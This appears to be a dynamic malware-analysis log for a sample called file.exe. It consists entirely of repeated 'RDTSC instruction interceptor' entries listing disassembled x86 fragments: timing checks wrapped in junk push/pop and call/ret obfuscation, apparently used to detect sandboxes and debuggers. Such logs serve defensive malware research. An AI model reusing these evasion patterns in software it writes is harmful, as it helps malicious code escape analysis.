Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12461D6 second address: 12461EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F6778CEBE4Bh 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12461EA second address: 12461EE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1246745 second address: 1246749 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1246749 second address: 1246765 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F67787C0190h 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1246765 second address: 124678A instructions: 0x00000000 rdtsc 0x00000002 je 00007F6778CEBE46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jnp 00007F6778CEBE57h 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 120F806 second address: 120F80A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12468BC second address: 12468C2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12470E9 second address: 12470ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12470ED second address: 12470F1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 124716E second address: 124717D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F67787C018Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 124717D second address: 12471F8 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push edi 0x00000004 pop edi 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 add dword ptr [esp], 1D6DDBC2h 0x0000000f push 00000000h 0x00000011 push ecx 0x00000012 call 00007F6778CEBE48h 0x00000017 pop ecx 0x00000018 mov dword ptr [esp+04h], ecx 0x0000001c add dword ptr [esp+04h], 00000014h 0x00000024 inc ecx 0x00000025 push ecx 0x00000026 ret 0x00000027 pop ecx 0x00000028 ret 0x00000029 mov edi, dword ptr [ebp+122D1AFEh] 0x0000002f mov esi, dword ptr [ebp+122D29F9h] 0x00000035 call 00007F6778CEBE49h 0x0000003a pushad 0x0000003b jmp 00007F6778CEBE4Dh 0x00000040 pushad 0x00000041 pushad 0x00000042 popad 0x00000043 jmp 00007F6778CEBE56h 0x00000048 popad 0x00000049 popad 0x0000004a push eax 0x0000004b pushad 0x0000004c push esi 0x0000004d ja 00007F6778CEBE46h 0x00000053 pop esi 0x00000054 push eax 0x00000055 push edx 0x00000056 jnp 00007F6778CEBE46h 0x0000005c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12471F8 second address: 1247229 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b pushad 0x0000000c jno 00007F67787C0188h 0x00000012 pushad 0x00000013 je 00007F67787C0186h 0x00000019 push edi 0x0000001a pop edi 0x0000001b popad 0x0000001c popad 0x0000001d mov eax, dword ptr [eax] 0x0000001f pushad 0x00000020 pushad 0x00000021 push edx 0x00000022 pop edx 0x00000023 jnl 00007F67787C0186h 0x00000029 popad 0x0000002a pushad 0x0000002b push edx 0x0000002c pop edx 0x0000002d push eax 0x0000002e push edx 0x0000002f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1247DE6 second address: 1247DEA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1247DEA second address: 1247DF0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1247F45 second address: 1247F49 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1248087 second address: 1248092 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jng 00007F67787C0186h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12482F7 second address: 1248319 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6778CEBE53h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push edi 0x0000000d ja 00007F6778CEBE46h 0x00000013 pop edi 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1248319 second address: 1248323 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F67787C018Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12491A8 second address: 12491AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 124A46B second address: 124A46F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 124A46F second address: 124A475 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 124AE78 second address: 124AE7E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 124AE7E second address: 124AEE6 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F6778CEBE46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f add esi, dword ptr [ebp+124613BDh] 0x00000015 push 00000000h 0x00000017 mov esi, dword ptr [ebp+122D2B61h] 0x0000001d mov esi, dword ptr [ebp+122D2AADh] 0x00000023 push 00000000h 0x00000025 push 00000000h 0x00000027 push ebp 0x00000028 call 00007F6778CEBE48h 0x0000002d pop ebp 0x0000002e mov dword ptr [esp+04h], ebp 0x00000032 add dword ptr [esp+04h], 00000019h 0x0000003a inc ebp 0x0000003b push ebp 0x0000003c ret 0x0000003d pop ebp 0x0000003e ret 0x0000003f adc esi, 5FBA3C37h 0x00000045 jbe 00007F6778CEBE51h 0x0000004b jmp 00007F6778CEBE4Bh 0x00000050 xchg eax, ebx 0x00000051 push eax 0x00000052 push edx 0x00000053 jbe 00007F6778CEBE4Ch 0x00000059 push eax 0x0000005a push edx 0x0000005b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 124AEE6 second address: 124AEEA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 124B977 second address: 124B988 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop edx 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jl 00007F6778CEBE4Ch 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 124B988 second address: 124B98C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 124B98C second address: 124B996 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F6778CEBE4Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 124B996 second address: 124B9D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 nop 0x00000007 push edi 0x00000008 sub edi, dword ptr [ebp+122D3443h] 0x0000000e pop edi 0x0000000f mov di, dx 0x00000012 push 00000000h 0x00000014 or esi, dword ptr [ebp+122D29A5h] 0x0000001a push 00000000h 0x0000001c push 00000000h 0x0000001e push esi 0x0000001f call 00007F67787C0188h 0x00000024 pop esi 0x00000025 mov dword ptr [esp+04h], esi 0x00000029 add dword ptr [esp+04h], 00000017h 0x00000031 inc esi 0x00000032 push esi 0x00000033 ret 0x00000034 pop esi 0x00000035 ret 0x00000036 mov esi, ebx 0x00000038 xchg eax, ebx 0x00000039 pushad 0x0000003a push ebx 0x0000003b push eax 0x0000003c push edx 0x0000003d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 124B9D8 second address: 124B9E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 124B9E1 second address: 124B9E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 124D00B second address: 124D00F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 124D00F second address: 124D015 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1251E63 second address: 1251E69 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1251E69 second address: 1251E7B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jl 00007F67787C018Eh 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1250FEB second address: 1250FEF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 124D883 second address: 124D889 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1251F90 second address: 1251F96 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 124D889 second address: 124D89C instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jp 00007F67787C0198h 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 124D89C second address: 124D8A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1253F71 second address: 1253FB2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 nop 0x00000006 movsx edi, cx 0x00000009 push 00000000h 0x0000000b jmp 00007F67787C018Ah 0x00000010 push 00000000h 0x00000012 push 00000000h 0x00000014 push ebp 0x00000015 call 00007F67787C0188h 0x0000001a pop ebp 0x0000001b mov dword ptr [esp+04h], ebp 0x0000001f add dword ptr [esp+04h], 00000017h 0x00000027 inc ebp 0x00000028 push ebp 0x00000029 ret 0x0000002a pop ebp 0x0000002b ret 0x0000002c mov ebx, dword ptr [ebp+122D2A05h] 0x00000032 xchg eax, esi 0x00000033 pushad 0x00000034 push esi 0x00000035 push eax 0x00000036 push edx 0x00000037 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1254FB9 second address: 1254FC7 instructions: 0x00000000 rdtsc 0x00000002 je 00007F6778CEBE46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1254FC7 second address: 1254FCB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1254FCB second address: 1255008 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F6778CEBE46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov dword ptr [esp], eax 0x0000000e pushad 0x0000000f adc di, E252h 0x00000014 call 00007F6778CEBE4Bh 0x00000019 pushad 0x0000001a popad 0x0000001b pop ecx 0x0000001c popad 0x0000001d mov dword ptr [ebp+1246FFACh], esi 0x00000023 push 00000000h 0x00000025 mov di, ax 0x00000028 push 00000000h 0x0000002a sub dword ptr [ebp+122D3827h], edi 0x00000030 push eax 0x00000031 push eax 0x00000032 push edx 0x00000033 push eax 0x00000034 push edx 0x00000035 pushad 0x00000036 popad 0x00000037 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1255008 second address: 125500C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 125500C second address: 1255012 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1256FF1 second address: 12570A8 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F67787C0186h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e push edx 0x0000000f pop edx 0x00000010 jmp 00007F67787C0190h 0x00000015 popad 0x00000016 pop edx 0x00000017 nop 0x00000018 push 00000000h 0x0000001a push edx 0x0000001b call 00007F67787C0188h 0x00000020 pop edx 0x00000021 mov dword ptr [esp+04h], edx 0x00000025 add dword ptr [esp+04h], 0000001Bh 0x0000002d inc edx 0x0000002e push edx 0x0000002f ret 0x00000030 pop edx 0x00000031 ret 0x00000032 sub dword ptr [ebp+122D34F3h], esi 0x00000038 call 00007F67787C0193h 0x0000003d or bx, 9378h 0x00000042 pop ebx 0x00000043 push 00000000h 0x00000045 mov ebx, dword ptr [ebp+122D19AAh] 0x0000004b push 00000000h 0x0000004d push 00000000h 0x0000004f push edx 0x00000050 call 00007F67787C0188h 0x00000055 pop edx 0x00000056 mov dword ptr [esp+04h], edx 0x0000005a add dword ptr [esp+04h], 0000001Bh 0x00000062 inc edx 0x00000063 push edx 0x00000064 ret 0x00000065 pop edx 0x00000066 ret 0x00000067 js 00007F67787C0197h 0x0000006d jmp 00007F67787C0191h 0x00000072 xchg eax, esi 0x00000073 push eax 0x00000074 push edx 0x00000075 jmp 00007F67787C018Bh 0x0000007a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12570A8 second address: 12570AD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12570AD second address: 12570B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1259154 second address: 1259158 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 120555C second address: 1205562 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1205562 second address: 1205581 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6778CEBE51h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jnp 00007F6778CEBE46h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12596AE second address: 12596B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12596B2 second address: 12596B6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1256251 second address: 1256257 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1256257 second address: 125625B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 125B646 second address: 125B64C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 125B64C second address: 125B650 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12598BC second address: 12598C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 125D963 second address: 125D9CC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6778CEBE57h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ecx 0x0000000a jmp 00007F6778CEBE4Eh 0x0000000f pop ecx 0x00000010 popad 0x00000011 push eax 0x00000012 push eax 0x00000013 je 00007F6778CEBE48h 0x00000019 pushad 0x0000001a popad 0x0000001b pop eax 0x0000001c nop 0x0000001d push 00000000h 0x0000001f push eax 0x00000020 call 00007F6778CEBE48h 0x00000025 pop eax 0x00000026 mov dword ptr [esp+04h], eax 0x0000002a add dword ptr [esp+04h], 00000018h 0x00000032 inc eax 0x00000033 push eax 0x00000034 ret 0x00000035 pop eax 0x00000036 ret 0x00000037 push 00000000h 0x00000039 push 00000000h 0x0000003b mov dword ptr [ebp+122D3182h], esi 0x00000041 push eax 0x00000042 push eax 0x00000043 push edx 0x00000044 push edx 0x00000045 pushad 0x00000046 popad 0x00000047 pop edx 0x00000048 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 125E8B5 second address: 125E927 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F67787C0194h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c push 00000000h 0x0000000e push eax 0x0000000f call 00007F67787C0188h 0x00000014 pop eax 0x00000015 mov dword ptr [esp+04h], eax 0x00000019 add dword ptr [esp+04h], 0000001Bh 0x00000021 inc eax 0x00000022 push eax 0x00000023 ret 0x00000024 pop eax 0x00000025 ret 0x00000026 call 00007F67787C018Dh 0x0000002b mov di, 75CFh 0x0000002f pop edi 0x00000030 push 00000000h 0x00000032 jmp 00007F67787C0192h 0x00000037 push 00000000h 0x00000039 mov bl, F9h 0x0000003b xchg eax, esi 0x0000003c jo 00007F67787C018Eh 0x00000042 push esi 0x00000043 push eax 0x00000044 push edx 0x00000045 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 125F8BB second address: 125F8BF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 125F8BF second address: 125F8D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 je 00007F67787C0198h 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1261956 second address: 126195A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 126195A second address: 126196B instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pushad 0x00000004 popad 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e push esi 0x0000000f pop esi 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 126476D second address: 126477D instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pushad 0x00000004 popad 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a jno 00007F6778CEBE46h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12662F5 second address: 12662F9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12662F9 second address: 126630B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F6778CEBE46h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push edi 0x0000000f pop edi 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 126630B second address: 126630F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 126630F second address: 1266321 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 jnp 00007F6778CEBE56h 0x0000000d pushad 0x0000000e push edi 0x0000000f pop edi 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1269791 second address: 12697AA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F67787C0195h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 126C3E6 second address: 126C3F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 push esi 0x00000007 pop esi 0x00000008 push esi 0x00000009 pop esi 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 126C3F5 second address: 126C3F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 126C3F9 second address: 126C3FD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 126C3FD second address: 126C406 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12701CB second address: 12701EA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 pushad 0x00000008 popad 0x00000009 jbe 00007F6778CEBE46h 0x0000000f pop edi 0x00000010 pop ecx 0x00000011 jp 00007F6778CEBE71h 0x00000017 push eax 0x00000018 push edx 0x00000019 jne 00007F6778CEBE46h 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 127563F second address: 127565C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F67787C018Fh 0x0000000b popad 0x0000000c mov eax, dword ptr [eax] 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 127565C second address: 1275663 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1279839 second address: 1279851 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F67787C0191h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 127A2A0 second address: 127A2C6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jnl 00007F6778CEBE48h 0x0000000e jnl 00007F6778CEBE56h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 127A45D second address: 127A468 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 127A468 second address: 127A478 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F6778CEBE46h 0x0000000a pop ebx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push ebx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 127A478 second address: 127A482 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 127A482 second address: 127A48A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 127A5D2 second address: 127A5E3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jnp 00007F67787C0192h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
